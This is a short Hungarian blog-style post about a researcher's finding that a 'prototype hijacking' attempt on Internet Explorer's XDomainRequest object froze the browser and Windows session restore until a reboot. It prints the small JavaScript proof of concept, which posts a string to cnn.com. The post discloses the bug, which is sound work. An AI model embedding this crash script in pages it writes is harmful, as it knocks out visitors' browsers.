A legutóbbi áttekintés után Ronald nekiállt az XDomainRequestek hackelésének, és rövid úton sikerrel is járt. A böngésző egy "prototype hijackingre" (prototípus csáklyázás?) tett kísérlet után megfagy, majd az operációs rendszer (Windows) megpróbálja helyreállítani a munkamenetet, aminek újabb fagyás a vége, stb. Végül a gép újraindítása segít a helyzeten. A PoC így néz ki:
<script>
// trying prototype hijacking here.
xdr = XDomainRequest;
xdr = function() {
return new XDomainRequest();
}
ping = 'hello';
xdr = new XDomainRequest();
xdr.open("POST", "http://cnn.com");
xdr.send(ping);
</script>